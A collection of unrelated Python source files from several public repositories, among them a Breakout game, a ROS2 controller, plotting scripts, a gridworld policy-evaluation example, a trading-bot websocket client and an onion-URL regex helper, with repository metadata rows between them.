        obj5 = self.window.get_object_at(self.ball.x + 2*BALL_RADIUS, self.ball.y)
        obj6 = self.window.get_object_at(self.ball.x, self.ball.y + 2*BALL_RADIUS)
        obj7 = self.window.get_object_at(self.ball.x + 2*BALL_RADIUS, self.ball.y + 2*BALL_RADIUS)
        if obj4 != self.paddle and obj4 is not None:
            self.window.remove(obj4)
            self.count += 1
            self.__dy = -self.__dy
        elif obj5 != self.paddle and obj5 is not None:
            self.__dy = -self.__dy
            self.count += 1
            self.window.remove(obj5)
        elif obj6 != self.paddle and obj6 is not None:
            self.__dy = -self.__dy
            self.count += 1
            self.window.remove(obj6)
        elif obj7 != self.paddle and obj7 is not None:
            self.__dy = -self.__dy
            self.count += 1
            self.window.remove(obj7)

    def is_win_game(self):
        '''
        If the game removed all the bricks
        :return: boolean (True/False)
        '''
        if self.count == BRICK_ROWS * BRICK_COLS:
            return True

    def win_game(self):
        '''
        If the player wins, the game is over and the win banner appears.
        :return: sign2, label2
        '''
        sign2 = GRect(self.window.width, self.window.height, x=0, y=0)
        sign2.filled = True
        sign2.color = 'yellow'
        sign2.fill_color = 'yellow'
        self.window.add(sign2)
        label2 = GLabel('You win !', x=self.window.width/3.5, y=self.window.height/2)
        label2.font = 'Helvetica-35'
        label2.color = 'black'
        self.window.add(label2)

    def end_game(self):
        '''
        If the player loses, the game is over and the lose banner appears.
        :return: sign, label
        '''
        sign = GRect(self.window.width, self.window.height, x=0, y=0)
        sign.filled = True
        sign.color = 'red'
        sign.fill_color = 'red'
        self.window.add(sign)
        label = GLabel('You lose', x=self.window.width/3.5, y=self.window.height/2)
        label.font = 'Helvetica-35'
        label.color = 'black'
        self.window.add(label)

    # Getters
    def get_dx(self):
        return self.__dx

    def get_dy(self):
        return self.__dy

    def get_ball(self):
        return self.ball
# File: python/src/algorithm/coding/set/setupdate.py (repo: kakaba2009/MachineLearning, license: Apache-2.0)
n = int(input())
s = set(map(int, input().split()))
N = int(input())
for i in range(N):
    cmd = input()
    B = set(map(int, input().split()))
    if "symmetric_difference_update" in cmd:
        s.symmetric_difference_update(B)
    elif "intersection_update" in cmd:
        s.intersection_update(B)
    elif "difference_update" in cmd:
        s.difference_update(B)
    elif "update" in cmd:
        s.update(B)
print(sum(s))
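For reference, the four in-place set methods the script dispatches on behave as follows (a standalone sketch, independent of the line-based input above):

```python
s = {1, 2, 3}

s.update({3, 4})                       # in-place union
assert s == {1, 2, 3, 4}

s.intersection_update({2, 3, 4, 5})    # keep only elements present in both
assert s == {2, 3, 4}

s.difference_update({4})               # drop elements present in the other set
assert s == {2, 3}

s.symmetric_difference_update({3, 9})  # keep elements in exactly one of the sets
assert s == {2, 9}

print(sum(s))  # → 11
```

Note that the script must test the longer command names first: `"update" in cmd` is a substring match, so it would also match `intersection_update` if checked earlier.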
# File: RemoteRunner/Controllers/ROS/ROS2Controller.py (repo: StanSwanborn/robot-runner, license: MIT)
import time
from pathlib import Path
from Procedures.ProcessProcedure import ProcessProcedure
from Controllers.ROS.IROSController import IROSController
from Procedures.OutputProcedure import OutputProcedure as output
### =========================================================
### | |
### | ROS2Controller |
### | - Define communications with ROS2 |
### | - ROS2 does not need a roscore process |
### | - Launch a launch file (.launch.py) |
### | - Start ros2 bag recording of topics |
### | - Stop is automatic (for now) |
### | - Define graceful shutdown procedure |
### | for both Native and Sim runs |
### | |
### | * Any function which is implementation |
### | specific (ROS2) should be declared here |
### | |
### =========================================================
class ROS2Controller(IROSController):
    def roscore_start(self):
        pass  # ROS2 does not have / need roscore.

    def rosbag_stop_recording_topics(self, bag_name):
        pass  # TODO: For now OK, needs to terminate ros2bag process in future.

    def roslaunch_launch_file(self, launch_file: Path):
        output.console_log(f"ros2 launch {launch_file}")
        command = f"ros2 launch {launch_file}"
        self.roslaunch_proc = ProcessProcedure.subprocess_spawn(command, "ros2_launch_file")

    def rosbag_start_recording_topics(self, topics, file_path, bag_name):
        file_path += "-ros2"
        output.console_log("Rosbag2 starts recording...")
        output.console_log_bold("Recording topics: ")
        # Build 'ros2 bag record --output file_path [/topic1 /topic2 ...]' command
        command = f" ros2 bag record --output {file_path}"
        for topic in topics:
            command += f" {topic}"
            output.console_log_bold(f" * {topic}")
        ProcessProcedure.subprocess_spawn(command, "ros2bag_record")
        time.sleep(1)  # Give rosbag recording some time to initiate

    def sim_shutdown(self):
        output.console_log("Shutting down sim run...")
        ProcessProcedure.subprocess_call("ros2 service call /reset_simulation std_srvs/srv/Empty {}", "ros2_reset_call")
        ProcessProcedure.process_kill_by_name("gzserver")
        ProcessProcedure.process_kill_by_name("gzclient")
        ProcessProcedure.process_kill_by_name("_ros2_daemon")
        ProcessProcedure.process_kill_by_name("ros2")
        ProcessProcedure.process_kill_by_cmdline("/opt/ros/")
        while ProcessProcedure.process_is_running("gzserver") or \
                ProcessProcedure.process_is_running("gzclient") or \
                ProcessProcedure.process_is_running("ros2") or \
                ProcessProcedure.process_is_running("_ros2_daemon"):
            output.console_log_animated("Waiting for graceful exit...")
        output.console_log("Sim run successfully shutdown!")

    def native_shutdown(self):
        output.console_log("Shutting down native run...")
        # TODO: Implement this, impossible as of now because of a known Linux Kernel bug
        # on ARM devices. Raspberry Pi overheats and crashes due to inability to throttle CPU.
        # Get all nodes, then for each node: ros2 lifecycle nodename shutdown
        pass
        # ======= ROS 1 =======
        # output.console_log("Shutting down native run...")
        # ProcessProcedure.subprocess_call('rosnode kill -a', "rosnode_kill")
        # ProcessProcedure.process_kill_by_name('rosmaster')
        # ProcessProcedure.process_kill_by_name('roscore')
        # ProcessProcedure.process_kill_by_name('rosout')
        #
        # while ProcessProcedure.process_is_running('rosmaster') and \
        #         ProcessProcedure.process_is_running('roscore') and \
        #         ProcessProcedure.process_is_running('rosout'):
        #     output.console_log_animated("Waiting for roscore to gracefully exit...")
        #
        # output.console_log("Native run successfully shutdown!")
# output.console_log("Native run successfully shutdown!") | 50.929412 | 120 | 0.594364 | 432 | 4,329 | 5.743056 | 0.340278 | 0.139057 | 0.070939 | 0.093511 | 0.293833 | 0.138654 | 0.050786 | 0 | 0 | 0 | 0 | 0.008417 | 0.28644 | 4,329 | 85 | 121 | 50.929412 | 0.794756 | 0.455532 | 0 | 0.073171 | 0 | 0 | 0.191871 | 0 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.146341 | false | 0.073171 | 0.121951 | 0 | 0.292683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
# File: cosine_similarity.py (repo: caikehe/YELP_DS, license: Apache-2.0)
import io, json, random
import matplotlib.pyplot as plt
from sklearn.metrics.pairwise import pairwise_distances
from matplotlib.backends.backend_pdf import PdfPages
def drawCOSFigure(features, output):
    histogram1Star = []
    histogram2Star = []
    histogram3Star = []
    histogram4Star = []
    histogram5Star = []
    nSamples = 100
    metricType = 'cosine'
    with open("data/output/cosine_similarity/histogram_1star.json") as oneStarFile:
        data = json.load(oneStarFile)
        for i, item in enumerate(data):
            if i > nSamples:
                break
            histogram1Star.append(list(item["histogram"][i] for i in features))
    with open("data/output/cosine_similarity/histogram_2star.json") as twoStarFile:
        data = json.load(twoStarFile)
        for i, item in enumerate(data):
            if i > nSamples:
                break
            histogram2Star.append(list(item["histogram"][i] for i in features))
    with open("data/output/cosine_similarity/histogram_3star.json") as threeStarFile:
        data = json.load(threeStarFile)
        for i, item in enumerate(data):
            if i > nSamples:
                break
            histogram3Star.append(list(item["histogram"][i] for i in features))
    with open("data/output/cosine_similarity/histogram_4star.json") as fourStarFile:
        data = json.load(fourStarFile)
        for i, item in enumerate(data):
            if i > nSamples:
                break
            histogram4Star.append(list(item["histogram"][i] for i in features))
    with open("data/output/cosine_similarity/histogram_5star.json") as fiveStarFile:
        data = json.load(fiveStarFile)
        for i, item in enumerate(data):
            if i > nSamples:
                break
            histogram5Star.append(list(item["histogram"][i] for i in features))

    matrix1Star = pairwise_distances(histogram1Star, Y=None, metric=metricType, n_jobs=1)
    matrix2Star = pairwise_distances(histogram2Star, Y=None, metric=metricType, n_jobs=1)
    matrix3Star = pairwise_distances(histogram3Star, Y=None, metric=metricType, n_jobs=1)
    matrix4Star = pairwise_distances(histogram4Star, Y=None, metric=metricType, n_jobs=1)
    matrix5Star = pairwise_distances(histogram5Star, Y=None, metric=metricType, n_jobs=1)

    length = nSamples
    x_array1Star = []
    y_array1Star = []
    x_array2Star = []
    y_array2Star = []
    x_array3Star = []
    y_array3Star = []
    x_array4Star = []
    y_array4Star = []
    x_array5Star = []
    y_array5Star = []
    left = -0.49
    right = 0.49
    for i in range(0, length):
        for j in range(i, length):
            x = 0.5 + random.uniform(left, right)
            y = 1 - matrix1Star[i][j]
            x_array1Star.append(x)
            y_array1Star.append(y)
    for i in range(0, length):
        for j in range(i, length):
            x = 1.5 + random.uniform(left, right)
            y = 1 - matrix2Star[i][j]
            x_array2Star.append(x)
            y_array2Star.append(y)
    for i in range(0, length):
        for j in range(i, length):
            x = 2.5 + random.uniform(left, right)
            y = 1 - matrix3Star[i][j]
            x_array3Star.append(x)
            y_array3Star.append(y)
    for i in range(0, length):
        for j in range(i, length):
            x = 3.5 + random.uniform(left, right)
            y = 1 - matrix4Star[i][j]
            x_array4Star.append(x)
            y_array4Star.append(y)
    for i in range(0, length):
        for j in range(i, length):
            x = 4.5 + random.uniform(left, right)
            y = 1 - matrix5Star[i][j]
            x_array5Star.append(x)
            y_array5Star.append(y)

    pp = PdfPages(output)
    plt.figure()
    plt.plot(x_array1Star, y_array1Star, 'ro', markersize=2.0)
    plt.plot(x_array2Star, y_array2Star, 'ro', markersize=2.0)
    plt.plot(x_array3Star, y_array3Star, 'ro', markersize=2.0)
    plt.plot(x_array4Star, y_array4Star, 'ro', markersize=2.0)
    plt.plot(x_array5Star, y_array5Star, 'ro', markersize=2.0)
    plt.axis([0, 5, 0, 1])
    plt.axvline(x=1, ymin=0, ymax=1, linewidth=1, color='r')
    plt.axvline(x=2, ymin=0, ymax=1, linewidth=1, color='r')
    plt.axvline(x=3, ymin=0, ymax=1, linewidth=1, color='r')
    plt.axvline(x=4, ymin=0, ymax=1, linewidth=1, color='r')
    plt.axvline(x=5, ymin=0, ymax=1, linewidth=1, color='r')
    # plt.show()
    plt.savefig(pp, format='pdf')
    pp.close()


def main():
    features = []
    features1 = [0, 1, 2, 3, 4, 5, 8]
    features2 = [0, 1, 2, 3, 4, 5, 8, 9, 10, 11]
    features3 = [0, 1, 2, 3, 4, 5, 8, 14, 15, 16, 17, 18, 19]
    features4 = [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 14, 15, 16, 17, 18, 19]
    features5 = [6, 7, 8]
    features6 = [6, 7, 8, 9, 10, 11]
    features7 = [6, 7, 8, 14, 15, 16, 17, 18, 19]
    features8 = [6, 7, 8, 9, 10, 11, 14, 15, 16, 17, 18, 19]
    features9 = [12, 13, 8]
    features10 = [12, 13, 8, 9, 10, 11]
    features11 = [12, 13, 8, 14, 15, 16, 17, 18, 19]
    features12 = [12, 13, 8, 9, 10, 11, 14, 15, 16, 17, 18, 19]
    features13 = [20, 21, 22, 23, 24]
    features14 = [20, 21, 22, 23, 24, 9, 10, 11]
    features15 = [20, 21, 22, 23, 24, 14, 15, 16, 17, 18, 19]
    features.append(features1)
    features.append(features2)
    features.append(features3)
    features.append(features4)
    features.append(features5)
    features.append(features6)
    features.append(features7)
    features.append(features8)
    features.append(features9)
    features.append(features10)
    features.append(features11)
    features.append(features12)
    features.append(features13)
    features.append(features14)
    features.append(features15)
    print(features)
    for i in range(1, 16):  # xrange replaced with range for Python 3
        print(i)
        output = 'report/refs/COS/multipage' + str(i) + '.pdf'
        drawCOSFigure(features[i-1], output)


if __name__ == "__main__":
    main()
# File: cobu/constants.py (repo: tlancaster6/cobu, license: MIT)
import os
try:
    from importlib.metadata import metadata  # Python 3.8
except ImportError:
    from importlib_metadata import metadata  # Python < 3.8
COBU_DIR = os.path.dirname(os.path.abspath(__file__))
BASE_DIR = os.path.dirname(COBU_DIR)
DATA_DIR = os.path.join(BASE_DIR, 'data')
# package metadata
_META = metadata("cobu")
NAME = _META["name"]
VERSION = _META["version"]
DESCRIPTION = _META["summary"]
AUTHOR = _META["author"]
AUTHOR_EMAIL = _META["author-email"]
URL = _META["home-page"]
LICENSE = _META["license"]
VERSION_LONG = "%s v%s, %s" % (NAME, VERSION, AUTHOR)
# File: wandroid/devices/utils.py (repo: westurner/wandroid, license: BSD-3-Clause)
#!/usr/bin/env python
# encoding: utf-8
from __future__ import print_function
"""
wandroid devices
"""
import pkg_resources
import wandroid.adbw as adbw
def get_devices():
    """
    mainfunc
    """
    entry_points = pkg_resources.iter_entry_points(group='wandroid_devices')
    for ep in entry_points:
        yield ep.name, ep.load()


def list_devices():
    print('installed wandroid.device packages\n'
          '----------------------------------')
    devices = get_devices()
    for name, cls in devices:
        print(name, cls)
    print('')

    print('adb devices\n'
          '-----------')
    adbw.adb('devices')
    print('')


import unittest


class Test_wandroid_devices(unittest.TestCase):
    def test_get_devices(self):
        devices = get_devices()
        devices = list(devices)
        self.assertTrue(bool(len(devices)))


def main():
    import logging
    import optparse
    import os.path
    import sys

    # TODO: argparse
    if '-d' in sys.argv:
        devname = sys.argv[2]
        devices = dict(get_devices())
        if devname not in devices:
            raise Exception("%r not in %r" % (devname, devices.keys()))
        cls = devices.get(devname)
        scriptname = os.path.basename(cls.__module__)
        newargs = [scriptname] + sys.argv[3:]
        print(newargs)
        return cls.main(*newargs)

    prs = optparse.OptionParser(usage="%prog : args")
    prs.add_option('-l', '--list-devices',
                   dest='list_devices',
                   action='store_true',
                   help='List supported devices')
    prs.add_option('-v', '--verbose',
                   dest='verbose',
                   action='store_true',)
    prs.add_option('-q', '--quiet',
                   dest='quiet',
                   action='store_true',)
    prs.add_option('-t', '--test',
                   dest='run_tests',
                   action='store_true',)
    (opts, args) = prs.parse_args()

    if not opts.quiet:
        logging.basicConfig()
        if opts.verbose:
            logging.getLogger().setLevel(logging.DEBUG)

    if opts.run_tests:
        sys.argv = [sys.argv[0]] + args
        import unittest
        sys.exit(unittest.main())

    if opts.list_devices:
        list_devices()


if __name__ == "__main__":
    import sys
    sys.exit(main())
# File: params_flow/utils/learn_scheduler.py (repo: kpe/params-flow, license: MIT)
# coding=utf-8
#
# created by kpe on 10.08.2019 at 12:39 AM
#
from __future__ import division, absolute_import, print_function
import math
from tensorflow import keras
def create_one_cycle_lr_scheduler(max_learn_rate=5e-5,
                                  end_learn_rate=1e-7,
                                  warmup_epoch_count=10,
                                  total_epoch_count=90):
    def lr_scheduler(epoch):
        if epoch < warmup_epoch_count:
            res = (max_learn_rate / warmup_epoch_count) * (epoch + 1)
        else:
            k = math.log(end_learn_rate / max_learn_rate) / (total_epoch_count - warmup_epoch_count)
            res = max_learn_rate * math.exp(k * (epoch - warmup_epoch_count))
        return float(res)

    learning_rate_scheduler = keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1)
    return learning_rate_scheduler
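The schedule can be checked in isolation by re-deriving the same values with plain `math` (a standalone sketch using this module's default hyperparameters; no TensorFlow required):

```python
import math

max_lr, end_lr = 5e-5, 1e-7  # defaults from create_one_cycle_lr_scheduler
warmup, total = 10, 90

def lr(epoch):
    # Linear warmup to max_lr over `warmup` epochs, then exponential
    # decay toward end_lr over the remaining epochs.
    if epoch < warmup:
        return (max_lr / warmup) * (epoch + 1)
    k = math.log(end_lr / max_lr) / (total - warmup)
    return max_lr * math.exp(k * (epoch - warmup))

assert abs(lr(9) - max_lr) < 1e-12          # warmup peaks at max_lr
assert lr(11) < lr(10) <= max_lr            # decay after the warmup phase
assert abs(lr(total - 1) - end_lr) < 1e-7   # final epoch is close to end_lr
```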
# File: cegid/apps/main/urls.py (repo: vsoch/tcell, license: MIT)
from django.views.generic.base import TemplateView
from django.conf.urls import patterns, url

from .views import index_view, signup_view, about_view, search_view, \
    home_view, contact_view

urlpatterns = [
    url(r'^$', index_view, name="index"),
    url(r'^search$', search_view, name="search"),
    url(r'^contact$', contact_view, name="contact"),
    url(r'^about$', about_view, name="about"),
    url(r'^home$', home_view, name="home"),
]
# File: students/K33422/Larionova Anastasia/lab 1/task1_client.py (repo: ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021, license: MIT)
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('localhost', 7777))
sock.send('Hello, server! :)'.encode('utf-8'))
d = sock.recv(1024)
print(d.decode('utf-8'))
sock.close()
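The client above expects a server listening on `localhost:7777`. A minimal counterpart could look like the sketch below (illustrative only — the lab's actual server script is not part of this chunk, and the name `serve_once` is ours):

```python
import socket

def serve_once(port=7777):
    """Accept a single connection, print the message, reply, then exit."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(('localhost', port))
    srv.listen(1)
    conn, addr = srv.accept()          # blocks until one client connects
    print(conn.recv(1024).decode('utf-8'))
    conn.send('Hello, client! :)'.encode('utf-8'))
    conn.close()
    srv.close()
```

Run the server first, then the client; the server prints the client's greeting and sends one reply back before exiting.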
# File: chapter-4/gridworld.py (repo: epignatelli/Reinforcement-Learning-An-Introduction_exercises, license: MIT)
# MIT License
# Copyright (c) 2020 Eduardo Pignatelli
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sn
from matplotlib.colors import LinearSegmentedColormap
W = LinearSegmentedColormap.from_list('w', ["w", "w"], N=256)
ACTIONS = {
0: [1, 0], # north
1: [-1, 0], # south
2: [0, -1], # west
3: [0, 1], # east
}
class GridWorld:
def __init__(self, size=4):
"""
A gridworld environment with absorbing states at [0, 0] and [size - 1, size - 1].
Args:
size (int): the dimension of the grid in each direction
"""
self.state_value = np.zeros((size, size))
return
    def reset(self):
        # reset all values to zero, keeping the grid shape
        self.state_value = np.zeros_like(self.state_value)
        return
def step(self, state, action):
# is terminal state?
size = len(self.state_value) - 1
if (state == (0, 0)) or (state == (size, size)):
return state, 0
s_1 = (state[0] + action[0], state[1] + action[1])
reward = -1
# out of bounds north-south
if s_1[0] < 0 or s_1[0] >= len(self.state_value):
s_1 = state
# out of bounds east-west
elif s_1[1] < 0 or s_1[1] >= len(self.state_value):
s_1 = state
return s_1, reward
def render(self, title=None):
"""
        Displays the current value table of the gridworld environment
"""
size = len(self.state_value) if len(self.state_value) < 20 else 20
fig, ax = plt.subplots(figsize=(size, size))
if title is not None:
ax.set_title(title)
ax.grid(which='major', axis='both',
linestyle='-', color='k', linewidth=2)
sn.heatmap(self.state_value, annot=True, fmt=".1f", cmap=W,
linewidths=1, linecolor="black", cbar=False)
plt.show()
return fig, ax
def bellman_expectation(self, state, probs, discount):
"""
        Makes a one-step lookahead and applies the Bellman expectation equation to the state self.state_value[state]
        Args:
            state (Tuple[int, int]): the row, column indices that define the address on the value table
            probs (List[float]): transition probabilities for each action
            discount (float): discount factor for the Bellman equation
        Returns:
            (float): the new value for the specified state
"""
        # expected value over all four actions (step() returns 0 reward at absorbing states)
        value = 0
for c, action in ACTIONS.items():
s_1, reward = self.step(state, action)
value += probs[c] * (reward + discount * self.state_value[s_1])
return value
def policy_evaluation(env, policy=None, steps=1, discount=1., in_place=False):
"""
Args:
        policy (numpy.ndarray): a 3-D array where the first two dimensions identify a state and the third dimension identifies the actions.
            The array stores the probability of taking each action.
        steps (int): the number of iterations of the algorithm
        discount (float): discount factor for the Bellman equations
        in_place (bool): if False, the value table is updated only after all the new values have been calculated;
            if True, the state [i, j] will already use the new values computed for the states [< i, < j]
"""
if policy is None:
# uniform random policy
policy = np.ones((*env.state_value.shape, len(ACTIONS))) * 0.25
for k in range(steps):
# cache old values if not in place
values = env.state_value if in_place else np.empty_like(
env.state_value)
for i in range(len(env.state_value)):
for j in range(len(env.state_value[i])):
# apply bellman expectation equation to each state
state = (i, j)
                value = env.bellman_expectation(state, policy[i, j], discount)
                values[i, j] = value  # discount is already applied inside bellman_expectation
# set the new value table
env.state_value = values
return env.state_value
if __name__ == "__main__":
    # reproduce Figure 4.1
for k in [1, 2, 3, 10, 1000]:
env = GridWorld(4)
env.render()
value_table = policy_evaluation(env, steps=k, in_place=False)
env.render()
| 39.359155 | 150 | 0.627661 | 789 | 5,589 | 4.378961 | 0.332066 | 0.052098 | 0.040521 | 0.024602 | 0.141823 | 0.125036 | 0.111722 | 0.097829 | 0.097829 | 0.075832 | 0 | 0.01868 | 0.281625 | 5,589 | 141 | 151 | 39.638298 | 0.841843 | 0.485776 | 0 | 0.121212 | 0 | 0 | 0.011295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.075758 | 0 | 0.287879 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
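As a sanity check on the evaluation loop above, here is a self-contained sketch of iterative policy evaluation on the same 4x4 gridworld (uniform random policy, discount 1, -1 reward per step, absorbing corners); the function and constant names are my own, but the dynamics mirror the class above, and after enough sweeps the values converge to the familiar Figure 4.1 table:

```python
import numpy as np

SIZE = 4
ACTIONS = [(1, 0), (-1, 0), (0, -1), (0, 1)]  # north, south, west, east

def step(state, action):
    # both corners are absorbing: stay put with zero reward
    if state == (0, 0) or state == (SIZE - 1, SIZE - 1):
        return state, 0
    s1 = (state[0] + action[0], state[1] + action[1])
    if not (0 <= s1[0] < SIZE and 0 <= s1[1] < SIZE):
        s1 = state  # bumping into a wall leaves the state unchanged
    return s1, -1

def evaluate(sweeps, discount=1.0):
    values = np.zeros((SIZE, SIZE))
    for _ in range(sweeps):
        new_values = np.empty_like(values)
        for i in range(SIZE):
            for j in range(SIZE):
                # Bellman expectation under the uniform random policy
                new_values[i, j] = sum(
                    0.25 * (r + discount * values[s1])
                    for s1, r in (step((i, j), a) for a in ACTIONS)
                )
        values = new_values
    return values
```

With `evaluate(1)` every non-terminal state evaluates to -1; with many sweeps the table converges toward the -14/-18/-20/-22 pattern of Figure 4.1.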
247eb44c889ef4965c1c10cc694955ebaa4b8ea6 | 2,571 | py | Python | client.py | esperantomerkato/tuner | b3998f6bcaf8acd1b541e2aa0670e0f0a0a8eb7d | [
"BSD-Source-Code"
] | null | null | null | client.py | esperantomerkato/tuner | b3998f6bcaf8acd1b541e2aa0670e0f0a0a8eb7d | [
"BSD-Source-Code"
] | null | null | null | client.py | esperantomerkato/tuner | b3998f6bcaf8acd1b541e2aa0670e0f0a0a8eb7d | [
"BSD-Source-Code"
] | null | null | null | import asyncio
import json
import websockets
from merkato.merkato_config import get_config
from merkato.parser import parse
from merkato.utils.database_utils import no_merkatos_table_exists, create_merkatos_table, drop_merkatos_table, \
no_exchanges_table_exists, create_exchanges_table, drop_exchanges_table
import logging
log = logging.getLogger("client")
"""
Merkato WebSocket CLI client.
This demonstrates the behavior that will eventually be moved to a Javascript GUI client.
Establish a connection to server, get user input, send config to server,
and loop awaiting updates from server. (In the GUI, it'll also loop awaiting user action e.g. button clicks.)
"""
async def client(url):
async with websockets.connect(url) as ws:
log.info("Connected.")
try:
merkato_params = get_merkato_params_from_user()
log.info("Sending Merkato params {}".format(merkato_params))
await ws.send(json.dumps({'merkato_params': merkato_params}))
while True:
msg = await ws.recv()
print("Received {}".format(msg))
except websockets.ConnectionClosed:
log.error("Server unexpectedly closed connection, investigate.")
exit(1)
def get_merkato_params_from_user():
print("Merkato Alpha v0.1.1\n")
if no_merkatos_table_exists():
create_merkatos_table()
else:
should_drop_merkatos = input('Do you want to drop merkatos? y/n: ')
if should_drop_merkatos == 'y':
drop_merkatos_table()
create_merkatos_table()
if no_exchanges_table_exists():
create_exchanges_table()
else:
should_drop_exchanges = input('Do you want to drop exchanges? y/n: ')
if should_drop_exchanges == 'y':
drop_exchanges_table()
create_exchanges_table()
configuration = parse()
if not configuration:
configuration = get_config()
if not configuration:
raise Exception("Failed to get configuration.")
base = input("Base: ")
coin = input("Coin: ")
spread = input("Spread: ")
coin_reserve = input("Coin reserve: ")
base_reserve = input("Base reserve: ")
return {
'configuration': configuration,
'base': base,
'coin': coin,
'spread': float(spread),
'bid_reserved_balance': float(base_reserve),
'ask_reserved_balance': float(coin_reserve)
}
if __name__ == "__main__":
url = "ws://localhost:5678"
asyncio.get_event_loop().run_until_complete(client(url)) | 30.975904 | 112 | 0.669 | 312 | 2,571 | 5.269231 | 0.38141 | 0.055353 | 0.041363 | 0.025547 | 0.170316 | 0.124088 | 0.099757 | 0 | 0 | 0 | 0 | 0.004065 | 0.234539 | 2,571 | 83 | 113 | 30.975904 | 0.831301 | 0 | 0 | 0.135593 | 0 | 0 | 0.168802 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016949 | false | 0 | 0.118644 | 0 | 0.152542 | 0.033898 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
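The client above depends on the third-party `websockets` package. For illustration only, the same send-config-then-await-replies handshake can be sketched with stdlib asyncio streams; the handler, the port, and the `"ack"` reply shape below are assumptions, not part of the Merkato codebase:

```python
import asyncio
import json

async def handle(reader, writer):
    # Server side of the sketch: read one JSON config line and acknowledge it.
    raw = await reader.readline()
    params = json.loads(raw.decode())["merkato_params"]
    writer.write((json.dumps({"ack": params["coin"]}) + "\n").encode())
    await writer.drain()
    writer.close()

async def round_trip(params):
    # Client side: connect, send the params, and wait for the server's reply,
    # mirroring the ws.send / ws.recv pattern in client.py above.
    server = await asyncio.start_server(handle, "127.0.0.1", 8765)
    reader, writer = await asyncio.open_connection("127.0.0.1", 8765)
    writer.write((json.dumps({"merkato_params": params}) + "\n").encode())
    await writer.drain()
    reply = json.loads((await reader.readline()).decode())
    writer.close()
    server.close()
    await server.wait_closed()
    return reply
```

`asyncio.run(round_trip({...}))` drives one full exchange; the real client keeps looping on `ws.recv()` for further updates.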
24801d3763c6b4f5d5fdf3b1bc18bbe2654427a3 | 356 | py | Python | application/web/helper.py | satan1a/poopak | 9862f09edc22c030db520e317020b54a36e070ac | [
"curl"
] | 91 | 2019-01-17T13:35:49.000Z | 2022-03-30T21:16:37.000Z | application/web/helper.py | satan1a/poopak | 9862f09edc22c030db520e317020b54a36e070ac | [
"curl"
] | 13 | 2019-01-13T14:35:51.000Z | 2021-04-26T05:13:42.000Z | application/web/helper.py | satan1a/poopak | 9862f09edc22c030db520e317020b54a36e070ac | [
"curl"
] | 33 | 2019-01-17T13:37:22.000Z | 2022-03-25T09:35:54.000Z | import re
def extract_onions(s):
    """Extract .onion URLs (with or without scheme) from a string."""
    result = []
    for m in re.finditer(r'(?:https?://)?(?:www)?(\S*?\.onion)\b', s, re.M | re.IGNORECASE):
        result.append(str(m.group(0)))
    return result
| 20.941176 | 92 | 0.485955 | 50 | 356 | 3.44 | 0.58 | 0.139535 | 0.104651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016 | 0.297753 | 356 | 16 | 93 | 22.25 | 0.672 | 0.205056 | 0 | 0 | 0 | 0 | 0.134058 | 0.134058 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
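A quick standalone check of the regex used in `extract_onions` above (same pattern, repackaged; the sample hostnames are made up):

```python
import re

# Same pattern as helper.py: optional scheme, optional bare "www",
# then a lazy run of non-whitespace ending in ".onion".
ONION_RE = re.compile(r'(?:https?://)?(?:www)?(\S*?\.onion)\b', re.M | re.IGNORECASE)

def extract_onions(s):
    # group(0) keeps the scheme when one was matched
    return [str(m.group(0)) for m in ONION_RE.finditer(s)]
```

Note that whitespace terminates a candidate, so ordinary words never match, and the scheme is included in the result only when present in the input.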
